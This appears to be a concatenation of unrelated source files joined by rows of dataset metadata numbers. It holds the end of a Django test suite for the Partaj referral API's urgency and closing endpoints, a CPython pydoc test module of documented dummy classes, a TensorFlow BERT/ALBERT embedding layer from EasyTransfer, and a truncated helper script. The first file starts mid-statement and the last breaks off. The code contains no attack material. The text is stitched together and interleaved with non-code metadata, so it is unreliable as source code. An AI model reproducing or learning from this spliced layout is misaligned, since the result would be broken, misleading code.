verb=models.ReferralActivityVerb.URGENCYLEVEL_CHANGED,
referral=referral,
).count(),
1,
)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.IN_VALIDATION)
self.assertEqual(new_urgencylevel.id, referral.urgency_level.id)
self.assertEqual(mock_mailer_send.call_count, 1)
self.assertEqual(
tuple(mock_mailer_send.call_args_list[0]),
(
( # args
{
"params": {
"case_number": referral.id,
"created_by": user.get_full_name(),
"link_to_referral": f"https://partaj/app/sent-referrals/referral-detail/{referral.id}",
"message": "La justification du changement.",
"new_due_date": dateformat.format(
referral.get_due_date(), "j F Y"
),
"old_due_date": dateformat.format(
referral.created_at + old_urgencylevel.duration, "j F Y"
),
"topic": referral.topic.name,
},
"replyTo": {
"email": "contact@partaj.beta.gouv.fr",
"name": "Partaj",
},
"templateId": settings.SENDINBLUE[
"REFERRAL_CHANGED_URGENCYLEVEL_FOR_REQUESTER_TEMPLATE_ID"
],
"to": [{"email": referral.user.email}],
},
),
{}, # kwargs
),
)
# Check the urgencylevel history instance that was created
urgencylevel_history = models.ReferralUrgencyLevelHistory.objects.get(
referral=referral, new_referral_urgency=new_urgencylevel
)
self.assertEqual(
"La justification du changement.",
urgencylevel_history.explanation,
)
self.assertEqual(new_urgencylevel, urgencylevel_history.new_referral_urgency)
self.assertEqual(old_urgencylevel, urgencylevel_history.old_referral_urgency)
def test_change_urgencylevel_from_answered_state(self, mock_mailer_send):
"""
The urgency level can be changed on a referral in the ANSWERED state.
"""
referral = factories.ReferralFactory(state=models.ReferralState.ANSWERED)
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=referral.units.get()
).user
new_urgencylevel = factories.ReferralUrgencyFactory()
old_urgencylevel = referral.urgency_level
self.assertNotEqual(new_urgencylevel.id, referral.urgency_level.id)
response = self.client.post(
f"/api/referrals/{referral.id}/change_urgencylevel/",
{
"urgencylevel_explanation": "La justification du changement.",
"urgencylevel": str(new_urgencylevel.id),
},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 400)
self.assertEqual(
response.json(),
{"errors": ["Cannot change urgency level from state answered."]},
)
# Make sure the urgency level is unchanged
self.assertEqual(models.ReferralActivity.objects.count(), 0)
self.assertEqual(models.ReferralUrgencyLevelHistory.objects.count(), 0)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.ANSWERED)
self.assertEqual(referral.urgency_level.id, old_urgencylevel.id)
mock_mailer_send.assert_not_called()
def test_change_urgencylevel_from_closed_state(self, mock_mailer_send):
"""
The urgency level can be changed on a referral in the CLOSED state.
"""
referral = factories.ReferralFactory(state=models.ReferralState.CLOSED)
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=referral.units.get()
).user
new_urgencylevel = factories.ReferralUrgencyFactory()
old_urgencylevel = referral.urgency_level
self.assertNotEqual(new_urgencylevel.id, referral.urgency_level.id)
response = self.client.post(
f"/api/referrals/{referral.id}/change_urgencylevel/",
{
"urgencylevel_explanation": "La justification du changement.",
"urgencylevel": str(new_urgencylevel.id),
},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 400)
self.assertEqual(
response.json(),
{"errors": ["Cannot change urgency level from state closed."]},
)
# Make sure the urgency level is unchanged
self.assertEqual(models.ReferralActivity.objects.count(), 0)
self.assertEqual(models.ReferralUrgencyLevelHistory.objects.count(), 0)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.CLOSED)
self.assertEqual(referral.urgency_level.id, old_urgencylevel.id)
mock_mailer_send.assert_not_called()
# CLOSE REFERRAL TESTS
def test_close_by_anonymous_user(self, mock_mailer_send):
"""
Anonymous users cannot refuse a referral.
"""
referral = factories.ReferralFactory(state=models.ReferralState.RECEIVED)
response = self.client.post(
f"/api/referrals/{referral.id}/close_referral/",
{"close_explanation": "La justification du refus."},
)
self.assertEqual(response.status_code, 401)
referral.refresh_from_db()
self.assertEqual(
referral.state,
models.ReferralState.RECEIVED,
)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
mock_mailer_send.assert_not_called()
def test_close_by_random_logged_in_user(self, mock_mailer_send):
"""
Random logged in users cannot close a referral.
"""
user = factories.UserFactory()
referral = factories.ReferralFactory(state=models.ReferralState.RECEIVED)
response = self.client.post(
f"/api/referrals/{referral.id}/close_referral/",
{"close_explanation": "La justification du refus."},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 403)
referral.refresh_from_db()
self.assertEqual(
referral.state,
models.ReferralState.RECEIVED,
)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
mock_mailer_send.assert_not_called()
def test_close_by_linked_user(self, mock_mailer_send):
"""
A referral's linked user can close their own referrals.
"""
user = factories.UserFactory()
referral = factories.ReferralFactory(
user=user, state=models.ReferralState.RECEIVED
)
unit_owner = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=referral.units.get()
)
response = self.client.post(
f"/api/referrals/{referral.id}/close_referral/",
{"close_explanation": "La justification de la cloture."},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 200)
referral.refresh_from_db()
self.assertEqual(
referral.state,
models.ReferralState.CLOSED,
)
activity = models.ReferralActivity.objects.get(referral=referral)
self.assertEqual(
activity.message,
"La justification de la cloture.",
)
self.assertEqual(activity.actor, user)
self.assertEqual(mock_mailer_send.call_count, 1)
self.assertEqual(
tuple(mock_mailer_send.call_args_list[0]),
(
( # args
{
"params": {
"case_number": referral.id,
"closed_by": user.get_full_name(),
"link_to_referral": (
f"https://partaj/app/unit/{referral.units.get().id}"
f"/referrals-list/referral-detail/{referral.id}"
),
"message": "La justification de la cloture.",
"referral_author": referral.user.get_full_name(),
"topic": referral.topic.name,
"units": referral.units.get().name,
},
"replyTo": {
"email": "contact@partaj.beta.gouv.fr",
"name": "Partaj",
},
"templateId": settings.SENDINBLUE[
"REFERRAL_CLOSED_FOR_UNIT_MEMBER_TEMPLATE_ID"
],
"to": [{"email": unit_owner.user.email}],
},
),
{}, # kwargs
),
)
def test_close_by_unit_member(self, mock_mailer_send):
"""
A regular unit member cannot close a referral.
"""
referral = factories.ReferralFactory(state=models.ReferralState.RECEIVED)
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.MEMBER, unit=referral.units.get()
).user
response = self.client.post(
f"/api/referrals/{referral.id}/close_referral/",
{"close_explanation": "La justification du refus."},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 403)
referral.refresh_from_db()
self.assertEqual(
referral.state,
models.ReferralState.RECEIVED,
)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
mock_mailer_send.assert_not_called()
def test_close_by_unit_admin(self, mock_mailer_send):
"""
Unit admins can close referrals.
"""
referral = factories.ReferralFactory(state=models.ReferralState.ASSIGNED)
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.ADMIN, unit=referral.units.get()
).user
response = self.client.post(
f"/api/referrals/{referral.id}/close_referral/",
{"close_explanation": "La justification de la cloture."},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 200)
referral.refresh_from_db()
activity = models.ReferralActivity.objects.get(referral=referral)
self.assertEqual(
activity.message,
"La justification de la cloture.",
)
self.assertEqual(activity.actor, user)
self.assertEqual(
referral.state,
models.ReferralState.CLOSED,
)
self.assertEqual(mock_mailer_send.call_count, 1)
self.assertEqual(
tuple(mock_mailer_send.call_args_list[0]),
(
( # args
{
"params": {
"case_number": referral.id,
"closed_by": user.get_full_name(),
"link_to_referral": (
f"https://partaj/app/sent-referrals/referral-detail/{referral.id}"
),
"message": "La justification de la cloture.",
"referral_author": referral.user.get_full_name(),
"topic": referral.topic.name,
"units": referral.units.get().name,
},
"replyTo": {
"email": "contact@partaj.beta.gouv.fr",
"name": "Partaj",
},
"templateId": settings.SENDINBLUE[
"REFERRAL_CLOSED_FOR_REQUESTER_TEMPLATE_ID"
],
"to": [{"email": referral.user.email}],
},
),
{}, # kwargs
),
)
def test_close_by_unit_owner(self, mock_mailer_send):
"""
Unit owners can close referrals.
"""
referral = factories.ReferralFactory(state=models.ReferralState.ASSIGNED)
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=referral.units.get()
).user
response = self.client.post(
f"/api/referrals/{referral.id}/close_referral/",
{"close_explanation": "La justification de la cloture."},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 200)
referral.refresh_from_db()
activity = models.ReferralActivity.objects.get(referral=referral)
self.assertEqual(
activity.message,
"La justification de la cloture.",
)
self.assertEqual(activity.actor, user)
self.assertEqual(
referral.state,
models.ReferralState.CLOSED,
)
self.assertEqual(mock_mailer_send.call_count, 1)
self.assertEqual(
tuple(mock_mailer_send.call_args_list[0]),
(
( # args
{
"params": {
"case_number": referral.id,
"closed_by": user.get_full_name(),
"link_to_referral": (
f"https://partaj/app/sent-referrals/referral-detail/{referral.id}"
),
"message": "La justification de la cloture.",
"referral_author": referral.user.get_full_name(),
"topic": referral.topic.name,
"units": referral.units.get().name,
},
"replyTo": {
"email": "contact@partaj.beta.gouv.fr",
"name": "Partaj",
},
"templateId": settings.SENDINBLUE[
"REFERRAL_CLOSED_FOR_REQUESTER_TEMPLATE_ID"
],
"to": [{"email": referral.user.email}],
},
),
{}, # kwargs
),
)
def test_close_with_missing_explanation(self, mock_mailer_send):
"""
Closure explanation is mandatory. Make sure the API returns an error when
it is missing.
"""
referral = factories.ReferralFactory(state=models.ReferralState.RECEIVED)
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.ADMIN, unit=referral.units.get()
).user
response = self.client.post(
f"/api/referrals/{referral.id}/close_referral/",
{"close_explanation": ""},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 400)
referral.refresh_from_db()
self.assertEqual(
referral.state,
models.ReferralState.RECEIVED,
)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
mock_mailer_send.assert_not_called()
def test_close_from_received_state(self, mock_mailer_send):
"""
Referrals in the RECEIVED state can be closed.
"""
referral = factories.ReferralFactory(state=models.ReferralState.RECEIVED)
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=referral.units.get()
).user
response = self.client.post(
f"/api/referrals/{referral.id}/close_referral/",
{"close_explanation": "La justification de la cloture."},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 200)
referral.refresh_from_db()
activity = models.ReferralActivity.objects.get(referral=referral)
self.assertEqual(
activity.message,
"La justification de la cloture.",
)
self.assertEqual(activity.actor, user)
self.assertEqual(
referral.state,
models.ReferralState.CLOSED,
)
self.assertEqual(mock_mailer_send.call_count, 1)
self.assertEqual(
tuple(mock_mailer_send.call_args_list[0]),
(
( # args
{
"params": {
"case_number": referral.id,
"closed_by": user.get_full_name(),
"link_to_referral": (
f"https://partaj/app/sent-referrals/referral-detail/{referral.id}"
),
"message": "La justification de la cloture.",
"referral_author": referral.user.get_full_name(),
"topic": referral.topic.name,
"units": referral.units.get().name,
},
"replyTo": {
"email": "contact@partaj.beta.gouv.fr",
"name": "Partaj",
},
"templateId": settings.SENDINBLUE[
"REFERRAL_CLOSED_FOR_REQUESTER_TEMPLATE_ID"
],
"to": [{"email": referral.user.email}],
},
),
{}, # kwargs
),
)
def test_close_from_processing_state(self, mock_mailer_send):
"""
Referrals in the PROCESSING state can be closed.
"""
referral = factories.ReferralFactory(state=models.ReferralState.PROCESSING)
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=referral.units.get()
).user
response = self.client.post(
f"/api/referrals/{referral.id}/close_referral/",
{"close_explanation": "La justification de la cloture."},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 200)
referral.refresh_from_db()
activity = models.ReferralActivity.objects.get(referral=referral)
self.assertEqual(
activity.message,
"La justification de la cloture.",
)
self.assertEqual(activity.actor, user)
self.assertEqual(
referral.state,
models.ReferralState.CLOSED,
)
self.assertEqual(mock_mailer_send.call_count, 1)
self.assertEqual(
tuple(mock_mailer_send.call_args_list[0]),
(
( # args
{
"params": {
"case_number": referral.id,
"closed_by": user.get_full_name(),
"link_to_referral": (
f"https://partaj/app/sent-referrals/referral-detail/{referral.id}"
),
"message": "La justification de la cloture.",
"referral_author": referral.user.get_full_name(),
"topic": referral.topic.name,
"units": referral.units.get().name,
},
"replyTo": {
"email": "contact@partaj.beta.gouv.fr",
"name": "Partaj",
},
"templateId": settings.SENDINBLUE[
"REFERRAL_CLOSED_FOR_REQUESTER_TEMPLATE_ID"
],
"to": [{"email": referral.user.email}],
},
),
{}, # kwargs
),
)
def test_close_from_in_validation_state(self, mock_mailer_send):
"""
Referrals in the IN_VALIDATION state can be closed.
"""
referral = factories.ReferralFactory(state=models.ReferralState.IN_VALIDATION)
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=referral.units.get()
).user
response = self.client.post(
f"/api/referrals/{referral.id}/close_referral/",
{"close_explanation": "La justification de la cloture."},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 200)
referral.refresh_from_db()
activity = models.ReferralActivity.objects.get(referral=referral)
self.assertEqual(
activity.message,
"La justification de la cloture.",
)
self.assertEqual(activity.actor, user)
self.assertEqual(
referral.state,
models.ReferralState.CLOSED,
)
self.assertEqual(mock_mailer_send.call_count, 1)
self.assertEqual(
tuple(mock_mailer_send.call_args_list[0]),
(
( # args
{
"params": {
"case_number": referral.id,
"closed_by": user.get_full_name(),
"link_to_referral": (
f"https://partaj/app/sent-referrals/referral-detail/{referral.id}"
),
"message": "La justification de la cloture.",
"referral_author": referral.user.get_full_name(),
"topic": referral.topic.name,
"units": referral.units.get().name,
},
"replyTo": {
"email": "contact@partaj.beta.gouv.fr",
"name": "Partaj",
},
"templateId": settings.SENDINBLUE[
"REFERRAL_CLOSED_FOR_REQUESTER_TEMPLATE_ID"
],
"to": [{"email": referral.user.email}],
},
),
{}, # kwargs
),
)
def test_close_from_answered_state(self, mock_mailer_send):
"""
Referrals in the ANSWERED state cannot be closed.
"""
referral = factories.ReferralFactory(state=models.ReferralState.ANSWERED)
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=referral.units.get()
).user
response = self.client.post(
f"/api/referrals/{referral.id}/close_referral/",
{"close_explanation": "La justification de la cloture."},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 400)
self.assertEqual(
response.json(), {"errors": ["Cannot close referral from state answered."]}
)
referral.refresh_from_db()
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
self.assertEqual(
referral.state,
models.ReferralState.ANSWERED,
)
mock_mailer_send.assert_not_called()
def test_close_from_closed_state(self, mock_mailer_send):
"""
Referrals in the CLOSED state cannot be closed.
"""
referral = factories.ReferralFactory(state=models.ReferralState.CLOSED)
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=referral.units.get()
).user
response = self.client.post(
f"/api/referrals/{referral.id}/close_referral/",
{"close_explanation": "La justification de la cloture."},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 400)
self.assertEqual(
response.json(), {"errors": ["Cannot close referral from state closed."]}
)
referral.refresh_from_db()
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
self.assertEqual(
referral.state,
models.ReferralState.CLOSED,
)
self.assertEqual(mock_mailer_send.call_count, 0)
| 41.920875
| 115
| 0.604474
| 16,775
| 174,307
| 6.107422
| 0.023428
| 0.088724
| 0.052005
| 0.032269
| 0.955843
| 0.946824
| 0.937268
| 0.92904
| 0.91803
| 0.911158
| 0
| 0.006396
| 0.29144
| 174,307
| 4,157
| 116
| 41.93096
| 0.823127
| 0.061277
| 0
| 0.765212
| 0
| 0
| 0.142758
| 0.075548
| 0
| 0
| 0
| 0
| 0.202641
| 1
| 0.032721
| false
| 0
| 0.00287
| 0
| 0.035878
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
42a0c1a92a3134b8bb6cf3713e4e8d8702eeb816
| 6,693
|
py
|
Python
|
code/tmp_rtrip/test/pydocfodder.py
|
emilyemorehouse/ast-and-me
|
3f58117512e125e1ecbe3c72f2f0d26adb80b7b3
|
[
"MIT"
] | 24
|
2018-01-23T05:28:40.000Z
|
2021-04-13T20:52:59.000Z
|
code/tmp_rtrip/test/pydocfodder.py
|
emilyemorehouse/ast-and-me
|
3f58117512e125e1ecbe3c72f2f0d26adb80b7b3
|
[
"MIT"
] | 17
|
2017-12-21T18:32:31.000Z
|
2018-12-18T17:09:50.000Z
|
code/tmp_rtrip/test/pydocfodder.py
|
emilyemorehouse/ast-and-me
|
3f58117512e125e1ecbe3c72f2f0d26adb80b7b3
|
[
"MIT"
] | null | null | null |
"""Something just to look at via pydoc."""
import types
class A_classic:
"""A classic class."""
def A_method(self):
"""Method defined in A."""
def AB_method(self):
"""Method defined in A and B."""
def AC_method(self):
"""Method defined in A and C."""
def AD_method(self):
"""Method defined in A and D."""
def ABC_method(self):
"""Method defined in A, B and C."""
def ABD_method(self):
"""Method defined in A, B and D."""
def ACD_method(self):
"""Method defined in A, C and D."""
def ABCD_method(self):
"""Method defined in A, B, C and D."""
class B_classic(A_classic):
"""A classic class, derived from A_classic."""
def AB_method(self):
"""Method defined in A and B."""
def ABC_method(self):
"""Method defined in A, B and C."""
def ABD_method(self):
"""Method defined in A, B and D."""
def ABCD_method(self):
"""Method defined in A, B, C and D."""
def B_method(self):
"""Method defined in B."""
def BC_method(self):
"""Method defined in B and C."""
def BD_method(self):
"""Method defined in B and D."""
def BCD_method(self):
"""Method defined in B, C and D."""
class C_classic(A_classic):
"""A classic class, derived from A_classic."""
def AC_method(self):
"""Method defined in A and C."""
def ABC_method(self):
"""Method defined in A, B and C."""
def ACD_method(self):
"""Method defined in A, C and D."""
def ABCD_method(self):
"""Method defined in A, B, C and D."""
def BC_method(self):
"""Method defined in B and C."""
def BCD_method(self):
"""Method defined in B, C and D."""
def C_method(self):
"""Method defined in C."""
def CD_method(self):
"""Method defined in C and D."""
class D_classic(B_classic, C_classic):
"""A classic class, derived from B_classic and C_classic."""
def AD_method(self):
"""Method defined in A and D."""
def ABD_method(self):
"""Method defined in A, B and D."""
def ACD_method(self):
"""Method defined in A, C and D."""
def ABCD_method(self):
"""Method defined in A, B, C and D."""
def BD_method(self):
"""Method defined in B and D."""
def BCD_method(self):
"""Method defined in B, C and D."""
def CD_method(self):
"""Method defined in C and D."""
def D_method(self):
"""Method defined in D."""
class A_new(object):
"""A new-style class."""
def A_method(self):
"""Method defined in A."""
def AB_method(self):
"""Method defined in A and B."""
def AC_method(self):
"""Method defined in A and C."""
def AD_method(self):
"""Method defined in A and D."""
def ABC_method(self):
"""Method defined in A, B and C."""
def ABD_method(self):
"""Method defined in A, B and D."""
def ACD_method(self):
"""Method defined in A, C and D."""
def ABCD_method(self):
"""Method defined in A, B, C and D."""
def A_classmethod(cls, x):
"""A class method defined in A."""
A_classmethod = classmethod(A_classmethod)
def A_staticmethod():
"""A static method defined in A."""
A_staticmethod = staticmethod(A_staticmethod)
def _getx(self):
"""A property getter function."""
def _setx(self, value):
"""A property setter function."""
def _delx(self):
"""A property deleter function."""
A_property = property(fdel=_delx, fget=_getx, fset=_setx, doc=
'A sample property defined in A.')
A_int_alias = int
class B_new(A_new):
"""A new-style class, derived from A_new."""
def AB_method(self):
"""Method defined in A and B."""
def ABC_method(self):
"""Method defined in A, B and C."""
def ABD_method(self):
"""Method defined in A, B and D."""
def ABCD_method(self):
"""Method defined in A, B, C and D."""
def B_method(self):
"""Method defined in B."""
def BC_method(self):
"""Method defined in B and C."""
def BD_method(self):
"""Method defined in B and D."""
def BCD_method(self):
"""Method defined in B, C and D."""
class C_new(A_new):
"""A new-style class, derived from A_new."""
def AC_method(self):
"""Method defined in A and C."""
def ABC_method(self):
"""Method defined in A, B and C."""
def ACD_method(self):
"""Method defined in A, C and D."""
def ABCD_method(self):
"""Method defined in A, B, C and D."""
def BC_method(self):
"""Method defined in B and C."""
def BCD_method(self):
"""Method defined in B, C and D."""
def C_method(self):
"""Method defined in C."""
def CD_method(self):
"""Method defined in C and D."""
class D_new(B_new, C_new):
"""A new-style class, derived from B_new and C_new.
"""
def AD_method(self):
"""Method defined in A and D."""
def ABD_method(self):
"""Method defined in A, B and D."""
def ACD_method(self):
"""Method defined in A, C and D."""
def ABCD_method(self):
"""Method defined in A, B, C and D."""
def BD_method(self):
"""Method defined in B and D."""
def BCD_method(self):
"""Method defined in B, C and D."""
def CD_method(self):
"""Method defined in C and D."""
def D_method(self):
"""Method defined in D."""
class FunkyProperties(object):
"""From SF bug 472347, by Roeland Rengelink.
Property getters etc may not be vanilla functions or methods,
and this used to make GUI pydoc blow up.
"""
def __init__(self):
self.desc = {'x': 0}
class get_desc:
def __init__(self, attr):
self.attr = attr
def __call__(self, inst):
print('Get called', self, inst)
return inst.desc[self.attr]
class set_desc:
def __init__(self, attr):
self.attr = attr
def __call__(self, inst, val):
print('Set called', self, inst, val)
inst.desc[self.attr] = val
class del_desc:
def __init__(self, attr):
self.attr = attr
def __call__(self, inst):
print('Del called', self, inst)
del inst.desc[self.attr]
x = property(get_desc('x'), set_desc('x'), del_desc('x'), 'prop x')
submodule = types.ModuleType(__name__ + '.submodule',
"A submodule, which should appear in its parent's summary")
| 22.765306
| 71
| 0.560287
| 982
| 6,693
| 3.675153
| 0.105906
| 0.167082
| 0.274314
| 0.407869
| 0.763369
| 0.74813
| 0.73954
| 0.731782
| 0.731782
| 0.731782
| 0
| 0.001483
| 0.294636
| 6,693
| 293
| 72
| 22.843003
| 0.762974
| 0.363215
| 0
| 0.672897
| 0
| 0
| 0.035557
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.71028
| false
| 0
| 0.009346
| 0
| 0.88785
| 0.028037
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
35f08970501297184a8c80c86cd8c0a064aa8a91
| 6,244
|
py
|
Python
|
easytransfer/layers/embedding.py
|
johnson7788/EasyTransfer
|
7e59935ab663fbdb9be56e7e081e59a2154b5489
|
[
"Apache-2.0"
] | 806
|
2020-09-02T03:05:24.000Z
|
2022-03-26T03:45:23.000Z
|
easytransfer/layers/embedding.py
|
johnson7788/EasyTransfer
|
7e59935ab663fbdb9be56e7e081e59a2154b5489
|
[
"Apache-2.0"
] | 48
|
2020-09-16T12:53:32.000Z
|
2022-03-09T09:34:44.000Z
|
easytransfer/layers/embedding.py
|
johnson7788/EasyTransfer
|
7e59935ab663fbdb9be56e7e081e59a2154b5489
|
[
"Apache-2.0"
] | 151
|
2020-09-16T12:31:06.000Z
|
2022-03-24T08:51:47.000Z
|
# coding=utf-8
# Copyright (c) 2019 Alibaba PAI team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import tensorflow as tf
from tensorflow.python.layers.base import Layer
from .core import LayerNormalization, Dropout
from .utils import get_initializer, get_shape_list
class BertEmbeddings(Layer):
"""Construct the embeddings from word, position and token_type embeddings.
"""
def __init__(self, config, **kwargs):
super(BertEmbeddings, self).__init__(**kwargs)
self.vocab_size = config.vocab_size
self.hidden_size = config.hidden_size
self.initializer_range = config.initializer_range
self.token_type_vocab_size = config.type_vocab_size
self.max_position_embeddings = config.max_position_embeddings
self.LayerNorm = LayerNormalization
self.dropout = Dropout(config.hidden_dropout_prob)
self.initializer = get_initializer(self.initializer_range)
def build(self, input_shape):
"""Build shared word embedding layer """
self.word_embeddings = self.add_weight(
"word_embeddings",
dtype=tf.float32,
shape=[self.vocab_size, self.hidden_size],
initializer=self.initializer,
)
self.position_embeddings = self.add_weight(
"position_embeddings",
dtype=tf.float32,
shape=[self.max_position_embeddings, self.hidden_size],
initializer=self.initializer,
)
self.token_type_embeddings = self.add_weight(
"token_type_embeddings",
dtype=tf.float32,
shape=[self.token_type_vocab_size, self.hidden_size],
initializer=self.initializer,
)
super(BertEmbeddings,self).build(input_shape)
def call(self, inputs, training=False):
input_ids, token_type_ids = inputs
input_embeddings = tf.gather(self.word_embeddings, input_ids)
input_shape = get_shape_list(input_embeddings)
batch_size = input_shape[0]
seq_length = input_shape[1]
width = input_shape[2]
# This vocab will be small so we always do one-hot here, since it is always
# faster for a small vocabulary.
flat_token_type_ids = tf.reshape(token_type_ids, [-1])
one_hot_ids = tf.one_hot(flat_token_type_ids, depth=self.token_type_vocab_size)
token_type_embeddings = tf.matmul(one_hot_ids, self.token_type_embeddings)
token_type_embeddings = tf.reshape(token_type_embeddings,
[batch_size, seq_length, width])
input_embeddings += token_type_embeddings
position_embeddings = tf.gather(self.position_embeddings, tf.range(0, seq_length))
position_embeddings = tf.expand_dims(position_embeddings, 0)
input_embeddings += position_embeddings
output = self.LayerNorm(input_embeddings, name="LayerNorm")
output = self.dropout(output, training=training)
return output
class AlbertEmbeddings(Layer):
"""Construct the embeddings from word, position and token_type embeddings.
"""
def __init__(self, config, **kwargs):
super(AlbertEmbeddings, self).__init__(**kwargs)
self.vocab_size = config.vocab_size
self.embedding_size = config.embedding_size
self.initializer_range = config.initializer_range
self.token_type_vocab_size = config.type_vocab_size
self.max_position_embeddings = config.max_position_embeddings
self.LayerNorm = LayerNormalization
self.dropout = Dropout(config.hidden_dropout_prob)
self.initializer = get_initializer(self.initializer_range)
def build(self, input_shape):
"""Build shared word embedding layer """
self.word_embeddings = self.add_weight(
"word_embeddings",
dtype=tf.float32,
shape=[self.vocab_size, self.embedding_size],
initializer=self.initializer,
)
self.position_embeddings = self.add_weight(
"position_embeddings",
dtype=tf.float32,
shape=[self.max_position_embeddings, self.embedding_size],
initializer=self.initializer,
)
self.token_type_embeddings = self.add_weight(
"token_type_embeddings",
dtype=tf.float32,
shape=[self.token_type_vocab_size, self.embedding_size],
initializer=self.initializer,
)
super(AlbertEmbeddings, self).build(input_shape)
def call(self, inputs, training=False):
input_ids, token_type_ids = inputs
input_embeddings = tf.gather(self.word_embeddings, input_ids)
input_shape = get_shape_list(input_embeddings)
batch_size = input_shape[0]
seq_length = input_shape[1]
width = input_shape[2]
# This vocab will be small so we always do one-hot here, since it is always
# faster for a small vocabulary.
flat_token_type_ids = tf.reshape(token_type_ids, [-1])
one_hot_ids = tf.one_hot(flat_token_type_ids, depth=self.token_type_vocab_size)
token_type_embeddings = tf.matmul(one_hot_ids, self.token_type_embeddings)
token_type_embeddings = tf.reshape(token_type_embeddings,
[batch_size, seq_length, width])
input_embeddings += token_type_embeddings
position_embeddings = tf.gather(self.position_embeddings, tf.range(0, seq_length))
position_embeddings = tf.expand_dims(position_embeddings, 0)
input_embeddings += position_embeddings
output = self.LayerNorm(input_embeddings, name="LayerNorm")
output = self.dropout(output, training=training)
return output
| 39.518987
| 90
| 0.682735
| 753
| 6,244
| 5.383798
| 0.196547
| 0.066601
| 0.074988
| 0.02664
| 0.821904
| 0.813764
| 0.813764
| 0.810064
| 0.787864
| 0.787864
| 0
| 0.006926
| 0.236867
| 6,244
| 158
| 91
| 39.518987
| 0.843861
| 0.161115
| 0
| 0.769231
| 0
| 0
| 0.024611
| 0.008075
| 0
| 0
| 0
| 0
| 0
| 1
| 0.057692
| false
| 0
| 0.038462
| 0
| 0.134615
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c40504e00e662f527f38ab77e8d3532a6e724a49
| 52
|
py
|
Python
|
helper.py
|
cms3my/cs3240-labdemo
|
7912ff32d3cb110bbad3dcf321860f10be5ce6c0
|
[
"MIT"
] | null | null | null |
helper.py
|
cms3my/cs3240-labdemo
|
7912ff32d3cb110bbad3dcf321860f10be5ce6c0
|
[
"MIT"
] | null | null | null |
helper.py
|
cms3my/cs3240-labdemo
|
7912ff32d3cb110bbad3dcf321860f10be5ce6c0
|
[
"MIT"
] | null | null | null |
def greeting(msg):
print(str(msg))
print(str(msg))
| 17.333333
| 18
| 0.692308
| 9
| 52
| 4
| 0.555556
| 0.444444
| 0.611111
| 0.777778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.096154
| 52
| 3
| 19
